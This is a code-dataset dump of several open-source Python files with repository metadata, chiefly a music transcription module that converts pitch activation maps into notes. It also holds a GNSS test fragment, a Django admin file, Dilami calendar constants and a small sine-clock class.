self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'X01')
# Valid constellation - invalid number
self.assertRaises(ValueError, get_nmea_id_from_prn, 'G00')
self.assertRaises(ValueError, get_nmea_id_from_prn, 'GAA')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'G33')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'C99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'R99')
self.assertRaises(NotImplementedError, get_nmea_id_from_prn, 'J99')
# None
self.assertRaises(TypeError, get_nmea_id_from_prn, None)
def test_nmea_ranges_are_valid(self):
last_end = 0
for entry in NMEA_ID_RANGES:
self.assertIn('range', entry)
self.assertIn('constellation', entry)
range_ = entry['range']
self.assertEqual(len(range_), 2)
start, end = range_
self.assertLessEqual(start, end)
self.assertLess(last_end, start)
last_end = end
| 31.895062
| 75
| 0.587962
| 4,500
| 0.870912
| 0
| 0
| 0
| 0
| 0
| 0
| 1,001
| 0.193729
|
a25d0281cfcfe0d0eb9dbdd381ee04036b26239e
| 29,969
|
py
|
Python
|
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | 4
|
2021-06-15T19:45:26.000Z
|
2022-03-31T20:42:26.000Z
|
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | null | null | null |
amt_tools/transcribe.py
|
cwitkowitz/transcription-models
|
e8697d6969b074926ac55986bc02fa1aad04b471
|
[
"MIT"
] | 1
|
2021-11-08T02:13:02.000Z
|
2021-11-08T02:13:02.000Z
|
# Author: Frank Cwitkowitz <fcwitkow@ur.rochester.edu>
# My imports
from . import tools
# Regular imports
from abc import abstractmethod
from copy import deepcopy
import numpy as np
import os
def filter_notes_by_duration(pitches, intervals, threshold=0.):
"""
Remove notes from a collection which have a duration less than a threshold
Parameters
----------
pitches : ndarray (N)
Array of pitches corresponding to notes
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
threshold : float
Minimum duration (seconds) to keep a note - if set to zero, notes must have non-zero duration
Returns
----------
pitches : ndarray (N)
Array of pitches corresponding to notes
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
"""
# Convert to batched notes for easy indexing
batched_notes = tools.notes_to_batched_notes(pitches, intervals)
# Calculate the duration of each note
durations = batched_notes[:, 1] - batched_notes[:, 0]
if threshold:
# Remove notes with duration below the threshold
batched_notes = batched_notes[durations >= threshold]
else:
# Remove zero-duration notes
batched_notes = batched_notes[durations > threshold]
# Convert back to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
return pitches, intervals
def multi_pitch_to_notes(multi_pitch, times, profile, onsets=None, offsets=None):
"""
Transcription protocol to convert a multi pitch array into loose MIDI note groups.
Parameters
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
profile : InstrumentProfile (instrument.py)
Instrument profile detailing experimental setup
onsets : ndarray (F x T) or None (Optional)
Where to start considering notes "active"
F - number of discrete pitches
T - number of frames
offsets : ndarray (F x T) or None (Optional)
Where to stop considering notes "active" - currently unused
F - number of discrete pitches
T - number of frames
Returns
----------
pitches : ndarray (N)
Array of pitches corresponding to notes in MIDI format
N - number of notes
intervals : ndarray (N x 2)
Array of onset-offset time pairs corresponding to notes
N - number of notes
"""
if onsets is None:
# Default the onsets if they were not provided
onsets = tools.multi_pitch_to_onsets(multi_pitch)
# Make sure all onsets have corresponding pitch activations
multi_pitch = np.logical_or(onsets, multi_pitch).astype(tools.FLOAT32)
# Turn onset activations into impulses at starting frame
onsets = tools.multi_pitch_to_onsets(onsets)
# Determine the total number of frames
num_frames = multi_pitch.shape[-1]
# Estimate the duration of the track (for bounding note offsets)
times = np.append(times, times[-1] + tools.estimate_hop_length(times))
# Create empty lists for note pitches and their time intervals
pitches, intervals = list(), list()
# Determine the pitch and frame indices where notes begin
pitch_idcs, frame_idcs = onsets.nonzero()
# Loop through note beginnings
for pitch, frame in zip(pitch_idcs, frame_idcs):
# Mark onset and start offset counter
onset, offset = frame, frame + 1
# Increment the offset counter until one of the following occurs:
# 1. There are no more frames
# 2. Pitch is no longer active in the multi pitch array
# 3. A new onset occurs involving the current pitch
while True:
# There are no more frames to count
maxed_out = offset == num_frames
if maxed_out:
# Stop looping
break
# There is an activation for the pitch at the next frame
active_pitch = multi_pitch[pitch, offset]
if not active_pitch:
# Stop looping
break
# There is an onset for the pitch at the next frame
new_onset = onsets[pitch, offset]
if new_onset:
# Stop looping
break
# Include the offset counter
offset += 1
# Add the frequency to the list
pitches.append(pitch + profile.low)
# Add the interval to the list
intervals.append([times[onset], times[offset]])
# Convert the lists to numpy arrays
pitches, intervals = np.array(pitches), np.array(intervals)
# Sort notes by onset just for the purpose of being neat
pitches, intervals = tools.sort_notes(pitches, intervals)
return pitches, intervals
##################################################
# ESTIMATORS #
##################################################
class ComboEstimator(object):
"""
A simple wrapper to run multiple estimators in succession.
Order matters. For instance, a MultiPitchRefiner could be
chained before a PitchListWrapper to use the refined
predictions when generating pitch list estimations.
"""
def __init__(self, estimators):
"""
Initialize estimators and instantiate.
Parameters
----------
estimators : list of Estimator
Estimators to use (in-order) when processing a track
"""
self.estimators = estimators
def process_track(self, raw_output, track=None):
"""
Process the track independently using each estimator.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
track : string or None (optional)
Name of the track to use when writing estimates
"""
# Copy the raw output dictionary and use it to hold estimates
output = deepcopy(raw_output)
# Loop through all of the estimators
for estimator in self.estimators:
# Process the track with the estimator and update the estimate dictionary
output.update(estimator.process_track(output, track))
return output
def set_save_dirs(self, save_dir, sub_dirs=None):
"""
Update the save directories for all of the estimators.
Parameters
----------
save_dir : string
Directory under which to write output
sub_dirs : list of string or None (optional)
Sub-directories to use underneath 'save_dir' for each estimator
Specifying None for an individual sub-directory
will disable saving for the respective estimator
"""
# Loop through all of the estimators
for i, estimator in enumerate(self.estimators):
if sub_dirs is None:
# Do not add a sub-directory to the path
new_dir = save_dir
elif sub_dirs[i] is None:
# Disable saving for the estimator
new_dir = None
else:
# Append the specified sub-directory if it exists
new_dir = os.path.join(save_dir, sub_dirs[i])
# Update the save directory
estimator.set_save_dir(new_dir)
class Estimator(object):
"""
Implements a generic music information retrieval estimator.
"""
def __init__(self, profile, save_dir):
"""
Initialize parameters common to all estimators and instantiate.
Parameters
----------
profile : InstrumentProfile (instrument.py)
Instrument profile detailing experimental setup
save_dir : string or None (optional)
Directory where estimates for each track will be written
"""
self.profile = profile
self.save_dir = None
self.set_save_dir(save_dir)
def set_save_dir(self, save_dir):
"""
Simple helper function to set and create a new save directory.
Parameters
----------
save_dir : string or None (optional)
Directory where estimates for each track will be written
"""
self.save_dir = save_dir
if self.save_dir is not None:
# Create the specified directory if it does not already exist
os.makedirs(self.save_dir, exist_ok=True)
@staticmethod
@abstractmethod
def get_key():
"""
Default key describing estimates.
"""
return NotImplementedError
@abstractmethod
def pre_proc(self, raw_output):
"""
This method can be overridden in order to insert extra steps.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
raw_output : dict
Copy of parameterized raw output
"""
# Create a local copy of the output so it is only modified within scope
raw_output = deepcopy(raw_output)
return raw_output
@abstractmethod
def estimate(self, raw_output):
"""
Obtain the estimate from the raw output.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
"""
return NotImplementedError
@abstractmethod
def write(self, estimate, track):
"""
Specify the protocol for writing the estimates.
Parameters
----------
estimate : object
Estimate for a track
track : string
Name of the track being processed
"""
return NotImplementedError
def process_track(self, raw_output, track=None):
"""
Combines pre_proc(), estimate(), and write(), and returns output in a dictionary.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
track : string or None (optional)
Name of the track being processed
Returns
----------
output : dict
Estimate packed in a dictionary
"""
# Perform any pre-processing steps
raw_output = self.pre_proc(raw_output)
# Obtain estimates for the track
estimate = self.estimate(raw_output)
if self.save_dir is not None:
# Write the results to a text file
self.write(estimate, track)
# Return the output in a dictionary
output = {self.get_key() : estimate}
return output
class StackedNoteTranscriber(Estimator):
"""
Estimate stacked notes from stacked multi pitch activation maps.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class for others...
inhibition_window : float or None (optional)
Amount of time after which another note of the same pitch cannot begin
minimum_duration : float or None (optional)
Minimum necessary duration to keep a note
"""
super().__init__(profile, save_dir)
self.inhibition_window = inhibition_window
self.minimum_duration = minimum_duration
@staticmethod
@abstractmethod
def get_key():
"""
Default key for note estimates.
"""
return tools.KEY_NOTES
def estimate(self, raw_output):
"""
Estimate notes for each slice of a stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_notes : dict
Dictionary containing (slice -> (pitches, intervals)) pairs
"""
# Obtain the multi pitch activation maps to transcribe
stacked_multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Determine the number of slices in the stacked multi pitch array
stack_size = stacked_multi_pitch.shape[-3]
# Obtain the frame times associated with the activation maps
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Obtain the onsets and offsets from the raw output if they exist
stacked_onsets = tools.unpack_dict(raw_output, tools.KEY_ONSETS)
stacked_offsets = tools.unpack_dict(raw_output, tools.KEY_OFFSETS)
# If no onsets were provided, prepare a list of None's
if stacked_onsets is None:
stacked_onsets = [None] * stack_size
# If no offsets were provided, prepare a list of None's
if stacked_offsets is None:
stacked_offsets = [None] * stack_size
# Initialize a dictionary to hold the notes
stacked_notes = dict()
# Loop through the slices of the stack
for slc in range(stack_size):
# Obtain all of the transcription information for this slice
multi_pitch, onsets, offsets = stacked_multi_pitch[slc], stacked_onsets[slc], stacked_offsets[slc]
if self.inhibition_window is not None:
if onsets is None:
# Default the onsets if they were not provided
onsets = tools.multi_pitch_to_onsets(multi_pitch)
# Remove trailing onsets within inhibition window of a previous onset
onsets = tools.inhibit_activations(onsets, times, self.inhibition_window)
# Transcribe this slice of activations
pitches, intervals = multi_pitch_to_notes(multi_pitch, times, self.profile, onsets, offsets)
if self.minimum_duration is not None:
# Filter the notes by duration
pitches, intervals = filter_notes_by_duration(pitches, intervals, self.minimum_duration)
# Add the pitch-interval pairs to the stacked notes dictionary under the slice key
stacked_notes.update(tools.notes_to_stacked_notes(pitches, intervals, slc))
return stacked_notes
def write(self, stacked_notes, track):
"""
Write slice-wise note estimates to respective files.
Parameters
----------
stacked_notes : dict
Dictionary containing (slice -> (pitches, intervals)) pairs
track : string
Name of the track being processed
"""
# Obtain a list of the stacked note keys
keys = list(stacked_notes.keys())
# Determine how to name the results
tag = tools.get_tag(track)
# Loop through the slices of the stack
for key in keys:
# Add another tag for the degree of freedom if more than one
slice_tag = f'{tag}_{key}' if len(stacked_notes) > 1 else f'{tag}'
# Construct a path for saving the estimates
path = os.path.join(self.save_dir, f'{slice_tag}.{tools.TXT_EXT}')
# Extract the loose note groups from the stack
pitches, intervals = stacked_notes[key]
# Write the notes to the path
tools.write_notes(pitches, intervals, path)
class NoteTranscriber(StackedNoteTranscriber):
"""
Estimate notes from a multi pitch activation map.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
def estimate(self, raw_output):
"""
Estimate notes from a multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
batched_notes : ndarray (N x 3)
Array of note intervals and pitches by row
N - number of notes
"""
# Perform any pre-processing steps
raw_output = self.pre_proc(raw_output)
# Obtain the multi pitch activation map to transcribe
multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Convert the multi pitch array to a stacked multi pitch array
raw_output[tools.KEY_MULTIPITCH] = tools.multi_pitch_to_stacked_multi_pitch(multi_pitch)
# Obtain onsets and offsets from output if they exist
onsets = tools.unpack_dict(raw_output, tools.KEY_ONSETS)
offsets = tools.unpack_dict(raw_output, tools.KEY_OFFSETS)
if onsets is not None:
# Convert onsets to a stacked onset activation map
raw_output[tools.KEY_ONSETS] = tools.multi_pitch_to_stacked_multi_pitch(onsets)
if offsets is not None:
# Convert offsets to a stacked offset activation map
raw_output[tools.KEY_OFFSETS] = tools.multi_pitch_to_stacked_multi_pitch(offsets)
# Call the parent class estimate function. Multi pitch is just a special
# case of stacked multi pitch, where there is only one degree of freedom
output = super().estimate(raw_output)
# Add the estimated output to the raw output
pitches, intervals = tools.stacked_notes_to_notes(output)
batched_notes = tools.notes_to_batched_notes(pitches, intervals)
return batched_notes
def write(self, batched_notes, track):
"""
Write note estimates to a file.
Parameters
----------
batched_notes : ndarray (N x 3)
Array of note intervals and pitches by row
N - number of notes
track : string
Name of the track being processed
"""
# Convert the batched notes to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
# Stack the loose note groups
stacked_notes = tools.notes_to_stacked_notes(pitches, intervals)
# Call the parent function
super().write(stacked_notes, track)
class StackedMultiPitchRefiner(StackedNoteTranscriber):
"""
Refine stacked multi pitch activation maps, after using them to make note
predictions, by converting note estimates back into multi pitch activation.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Refine a stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_multi_pitch : ndarray (S x F x T)
Array of multiple discrete pitch activation maps
S - number of slices in stack
F - number of discrete pitches
T - number of frames
"""
# Attempt to extract pre-existing note estimates
stacked_notes = tools.unpack_dict(raw_output, tools.KEY_NOTES)
if stacked_notes is None:
# Obtain note estimates if they were not provided
stacked_notes = super().estimate(raw_output)
# Convert the stacked notes back into stacked multi pitch activation maps
stacked_multi_pitch = tools.stacked_multi_pitch_to_stacked_onsets(stacked_notes)
return stacked_multi_pitch
def write(self, stacked_multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
stacked_multi_pitch : ndarray (S x F x T)
Array of multiple discrete pitch activation maps
S - number of slices in stack
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
class MultiPitchRefiner(NoteTranscriber):
"""
Refine a multi pitch activation map, after using it to make note
predictions, by converting note estimates back into multi pitch activation.
"""
def __init__(self, profile, save_dir=None, inhibition_window=None, minimum_duration=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See StackedNoteTranscriber class...
"""
super().__init__(profile, save_dir, inhibition_window, minimum_duration)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Refine a multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
"""
# Attempt to extract pre-existing note estimates
batched_notes = tools.unpack_dict(raw_output, tools.KEY_NOTES)
if batched_notes is None:
# Obtain note estimates if they were not provided
batched_notes = super().estimate(raw_output)
# Convert the batched notes to loose note groups
pitches, intervals = tools.batched_notes_to_notes(batched_notes)
# Obtain the frame times associated with the multi pitch array
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Convert the notes back into a multi pitch array
multi_pitch = tools.notes_to_multi_pitch(pitches, intervals, times, self.profile)
return multi_pitch
def write(self, multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
multi_pitch : ndarray (F x T)
Discrete pitch activation map
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
class StackedPitchListWrapper(Estimator):
"""
Wrapper for converting stacked multi pitch activations to stacked pitch lists.
"""
def __init__(self, profile, save_dir=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
"""
super().__init__(profile, save_dir)
@staticmethod
@abstractmethod
def get_key():
"""
Default key for pitch lists.
"""
return tools.KEY_PITCHLIST
def estimate(self, raw_output):
"""
Convert stacked multi pitch activations to stacked pitch lists.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
stacked_pitch_list : dict
Dictionary containing (slice -> (times, pitch_list)) pairs
"""
# Obtain the stacked multi pitch activation maps
stacked_multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Obtain the frame times associated with the stacked activation map
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Perform the conversion
stacked_pitch_list = tools.stacked_multi_pitch_to_stacked_pitch_list(stacked_multi_pitch, times, self.profile)
return stacked_pitch_list
def write(self, stacked_pitch_list, track):
"""
Write slice-wise pitch estimates to respective files.
Parameters
----------
stacked_pitch_list : dict
Dictionary containing (slice -> (times, pitch_list)) pairs
track : string
Name of the track being processed
"""
# Obtain a list of the stacked pitch list keys
keys = list(stacked_pitch_list.keys())
# Determine how to name the results
tag = tools.get_tag(track)
# Loop through the slices of the stack
for key in keys:
# Add another tag for the degree of freedom if more than one
slice_tag = f'{tag}_{key}' if len(stacked_pitch_list) > 1 else f'{tag}'
# Construct a path for saving the estimates
path = os.path.join(self.save_dir, f'{slice_tag}.{tools.TXT_EXT}')
# Extract the pitch list from the stack
times, pitch_list = stacked_pitch_list[key]
# Write the notes to the path
tools.write_pitch_list(times, pitch_list, path)
class PitchListWrapper(StackedPitchListWrapper):
"""
Wrapper for converting a multi pitch activation map to a pitch lists.
"""
def __init__(self, profile, save_dir=None):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
"""
super().__init__(profile, save_dir)
def estimate(self, raw_output):
"""
Convert a multi pitch activation map to a pitch lists.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
pitch_list : list of ndarray (N x [...])
Array of pitches corresponding to notes
N - number of pitch observations (frames)
"""
# Obtain the multi pitch activation map
multi_pitch = tools.unpack_dict(raw_output, tools.KEY_MULTIPITCH)
# Obtain the frame times associated with the activation map
times = tools.unpack_dict(raw_output, tools.KEY_TIMES)
# Perform the conversion
pitch_list = tools.multi_pitch_to_pitch_list(multi_pitch, self.profile)
return times, pitch_list
def write(self, pitch_list, track):
"""
Write pitch estimates to a file.
Parameters
----------
pitch_list : tuple containing
times : ndarray (N)
Time in seconds of beginning of each frame
N - number of time samples (frames)
pitch_list : list of ndarray (N x [...])
Array of pitches corresponding to notes
N - number of pitch observations (frames)
track : string
Name of the track being processed
"""
# Stack the pitch list
stacked_pitch_list = tools.pitch_list_to_stacked_pitch_list(*pitch_list)
# Call the parent function
super().write(stacked_pitch_list, track)
class TablatureWrapper(Estimator):
"""
Wrapper for converting tablature to multi pitch.
"""
def __init__(self, profile, save_dir=None, stacked=False):
"""
Initialize parameters for the estimator.
Parameters
----------
See Estimator class...
stacked : bool
Whether to collapse into a single representation or leave stacked
"""
super().__init__(profile, save_dir)
self.stacked = stacked
def get_key(self):
"""
Default key for multi pitch activations.
"""
return tools.KEY_MULTIPITCH
def estimate(self, raw_output):
"""
Convert tablature into a single or stacked multi pitch activation map.
Parameters
----------
raw_output : dict
Dictionary containing raw output relevant to estimation
Returns
----------
multi_pitch : ndarray ((S) x F x T)
Discrete pitch activation map
S - number of slices in stack - only if stacked=True
F - number of discrete pitches
T - number of frames
"""
# Obtain the tablature
tablature = tools.unpack_dict(raw_output, tools.KEY_TABLATURE)
# Perform the conversion
multi_pitch = tools.tablature_to_stacked_multi_pitch(tablature, self.profile)
if not self.stacked:
multi_pitch = tools.stacked_multi_pitch_to_multi_pitch(multi_pitch)
return multi_pitch
def write(self, multi_pitch, track):
"""
Do nothing. There is no protocol for writing multi pitch activation maps to a file.
A more appropriate action might be converting them to pitch lists and writing those.
Parameters
----------
multi_pitch : ndarray ((S) x F x T)
Discrete pitch activation map
S - number of slices in stack - only if stacked=True
F - number of discrete pitches
T - number of frames
track : string
Name of the track being processed
"""
pass
| 31.088174
| 118
| 0.622076
| 24,688
| 0.823785
| 0
| 0
| 1,929
| 0.064367
| 0
| 0
| 17,863
| 0.596049
|
a25d09e67ac4aff5540ba2b0f11ec21250507d36
| 121
|
py
|
Python
|
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
ToDoApp/admin.py
|
aishabazylzhanova/ToDo
|
a787e57bf8ace5719d847d8fc4949d05a5d117c5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Tasks
admin.site.register(Tasks)
# Register your models here.
| 20.166667
| 33
| 0.768595
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 29
| 0.239669
|
a25efb76b91de6c5a6535d8621723808a44381dd
| 8,046
|
py
|
Python
|
dilami_calendar/constants.py
|
Jangal/python-deylami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | 12
|
2019-08-05T19:11:24.000Z
|
2021-11-17T03:52:12.000Z
|
dilami_calendar/constants.py
|
Jangal/python-dilami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | 2
|
2019-08-03T05:42:02.000Z
|
2021-12-01T07:34:26.000Z
|
dilami_calendar/constants.py
|
Jangal/python-dilami-calendar
|
65b4a36ea6d9cba71b7086b3c488fd6842ead687
|
[
"MIT"
] | null | null | null |
DILAMI_WEEKDAY_NAMES = {
0: "شمبه",
1: "یکشمبه",
2: "دۊشمبه",
3: "سۊشمبه",
4: "چارشمبه",
5: "پئنشمبه",
6: "جۊمه",
}
DILAMI_MONTH_NAMES = {
0: "پنجيک",
1: "نؤرۊز ما",
2: "کۊرچ ٚ ما",
3: "أرئه ما",
4: "تیر ما",
5: "مۊردال ما",
6: "شریرما",
7: "أمیر ما",
8: "آول ما",
9: "سیا ما",
10: "دیا ما",
11: "ورفن ٚ ما",
12: "اسفندار ما",
}
DILAMI_LEAP_YEARS = (
199,
203,
207,
211,
215,
220,
224,
228,
232,
236,
240,
244,
248,
253,
257,
261,
265,
269,
273,
277,
281,
286,
290,
294,
298,
302,
306,
310,
315,
319,
323,
327,
331,
335,
339,
343,
348,
352,
356,
360,
364,
368,
372,
376,
381,
385,
389,
393,
397,
401,
405,
409,
414,
418,
422,
426,
430,
434,
438,
443,
447,
451,
455,
459,
463,
467,
471,
476,
480,
484,
488,
492,
496,
500,
504,
509,
513,
517,
521,
525,
529,
533,
537,
542,
546,
550,
554,
558,
562,
566,
571,
575,
579,
583,
587,
591,
595,
599,
604,
608,
612,
616,
620,
624,
628,
632,
637,
641,
645,
649,
653,
657,
661,
665,
669,
674,
678,
682,
686,
690,
694,
698,
703,
707,
711,
715,
719,
723,
727,
731,
736,
740,
744,
748,
752,
756,
760,
764,
769,
773,
777,
781,
785,
789,
793,
797,
802,
806,
810,
814,
818,
822,
826,
831,
835,
839,
843,
847,
851,
855,
859,
864,
868,
872,
876,
880,
884,
888,
892,
897,
901,
905,
909,
913,
917,
921,
925,
930,
934,
938,
942,
946,
950,
954,
959,
963,
967,
971,
975,
979,
983,
987,
992,
996,
1000,
1004,
1008,
1012,
1016,
1020,
1025,
1029,
1033,
1037,
1041,
1045,
1049,
1053,
1058,
1062,
1066,
1070,
1074,
1078,
1082,
1087,
1091,
1095,
1099,
1103,
1107,
1111,
1115,
1120,
1124,
1128,
1132,
1136,
1140,
1144,
1148,
1153,
1157,
1161,
1165,
1169,
1173,
1177,
1181,
1186,
1190,
1194,
1198,
1202,
1206,
1210,
1215,
1219,
1223,
1227,
1231,
1235,
1239,
1243,
1248,
1252,
1256,
1260,
1264,
1268,
1272,
1276,
1281,
1285,
1289,
1293,
1297,
1301,
1305,
1309,
1314,
1318,
1322,
1326,
1330,
1334,
1338,
1343,
1347,
1351,
1355,
1359,
1363,
1367,
1371,
1376,
1380,
1384,
1388,
1392,
1396,
1400,
1404,
1409,
1413,
1417,
1421,
1425,
1429,
1433,
1437,
1442,
1446,
1450,
1454,
1458,
1462,
1466,
1471,
1475,
1479,
1483,
1487,
1491,
1495,
1499,
1504,
1508,
1512,
1516,
1520,
1524,
1528,
1532,
1537,
1541,
1545,
1549,
1553,
1557,
1561,
1565,
1570,
1574,
1578,
1582,
1586,
1590,
1594,
1599,
1603,
1607,
1611,
1615,
1619,
1623,
1627,
1632,
1636,
1640,
1644,
1648,
1652,
1656,
1660,
1665,
1669,
1673,
1677,
1681,
1685,
1689,
1693,
1698,
1702,
1706,
1710,
1714,
1718,
1722,
1727,
1731,
1735,
1739,
1743,
1747,
1751,
1755,
1760,
1764,
1768,
1772,
1776,
1780,
1784,
1788,
1793,
1797,
1801,
1805,
1809,
1813,
1817,
1821,
1826,
1830,
1834,
1838,
1842,
1846,
1850,
1855,
1859,
1863,
1867,
1871,
1875,
1879,
1883,
1888,
1892,
1896,
1900,
1904,
1908,
1912,
1916,
1921,
1925,
1929,
1933,
1937,
1941,
1945,
1949,
1954,
1958,
1962,
1966,
1970,
1974,
1978,
1983,
1987,
1991,
1995,
1999,
2003,
2007,
2011,
2016,
2020,
2024,
2028,
2032,
2036,
2040,
2044,
2049,
2053,
2057,
2061,
2065,
2069,
2073,
2077,
2082,
2086,
2090,
2094,
2098,
2102,
2106,
2111,
2115,
2119,
2123,
2127,
2131,
2135,
2139,
2144,
2148,
2152,
2156,
2160,
2164,
2168,
2172,
2177,
2181,
2185,
2189,
2193,
2197,
2201,
2205,
2210,
2214,
2218,
2222,
2226,
2230,
2234,
2239,
2243,
2247,
2251,
2255,
2259,
2263,
2267,
2272,
2276,
2280,
2284,
2288,
2292,
2296,
2300,
2305,
2309,
2313,
2317,
2321,
2325,
2329,
2333,
2338,
2342,
2346,
2350,
2354,
2358,
2362,
2367,
2371,
2375,
2379,
2383,
2387,
2391,
2395,
2400,
2404,
2408,
2412,
2416,
2420,
2424,
2428,
2433,
2437,
2441,
2445,
2449,
2453,
2457,
2461,
2466,
2470,
2474,
2478,
2482,
2486,
2490,
2495,
2499,
2503,
2507,
2511,
2515,
2519,
2523,
2528,
2532,
2536,
2540,
2544,
2548,
2552,
2556,
2561,
2565,
2569,
2573,
2577,
2581,
2585,
2589,
2594,
2598,
2602,
2606,
2610,
2614,
2618,
2623,
2627,
2631,
2635,
2639,
2643,
2647,
2651,
2656,
2660,
2664,
2668,
2672,
2676,
2680,
2684,
2689,
2693,
2697,
2701,
2705,
2709,
2713,
2717,
2722,
2726,
2730,
2734,
2738,
2742,
2746,
2751,
2755,
2759,
2763,
2767,
2771,
2775,
2779,
2784,
2788,
2792,
2796,
2800,
2804,
2808,
2812,
2817,
2821,
2825,
2829,
2833,
2837,
2841,
2845,
2850,
2854,
2858,
2862,
2866,
2870,
2874,
2879,
2883,
2887,
2891,
2895,
2899,
2903,
2907,
2912,
2916,
2920,
2924,
2928,
2932,
2936,
2940,
2945,
2949,
2953,
2957,
2961,
2965,
2969,
2973,
2978,
2982,
2986,
2990,
2994,
2998,
3002,
3007,
3011,
3015,
3019,
3023,
3027,
3031,
3035,
3040,
3044,
3048,
3052,
3056,
3060,
3064,
3068,
3073,
3077,
3081,
3085,
3089,
3093,
3097,
3101,
3106,
3110,
3114,
3118,
3122,
3126,
3130,
3135,
3139,
3143,
3147,
3151,
3155,
3159,
3163,
3168,
3172,
3176,
3180,
3184,
3188,
3192,
3196,
3201,
3205,
3209,
3213,
3217,
3221,
3225,
3229,
3234,
3238,
3242,
3246,
3250,
3254,
3258,
3263,
3267,
3271,
3275,
3279,
3283,
3287,
3291,
3296,
3300,
3304,
3308,
3312,
3316,
3320,
3324,
3329,
3333,
3337,
3341,
3345,
3349,
3353,
3357,
3362,
3366,
3370,
)
#: Minimum year supported by the library.
MINYEAR = 195
#: Maximum year supported by the library.
MAXYEAR = 3372
| 10.007463
| 41
| 0.393239
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.046161
|
a25fceaa81b9a2397bbf59a5c9765ebd1d84a0d6
| 324
|
py
|
Python
|
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
inputs/sineClock.py
|
hongaar/ringctl
|
9e2adbdf16e85852019466e42be9d88a9e63cde5
|
[
"MIT"
] | null | null | null |
import math
from inputs.sine import Sine
from inputs.timeElapsed import TimeElapsed
from utils.number import Number
class SineClock(Number):
def __init__(self, sine: Sine):
self.__sine = sine
self.__elapsed = TimeElapsed()
def get(self):
return self.__sine.at_time(self.__elapsed.get())
| 20.25
| 56
| 0.70679
| 203
| 0.626543
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a26034218c90d245fe24941c0da299f8ed7dd85c
| 667
|
py
|
Python
|
config/urls.py
|
erik-sn/tagmap
|
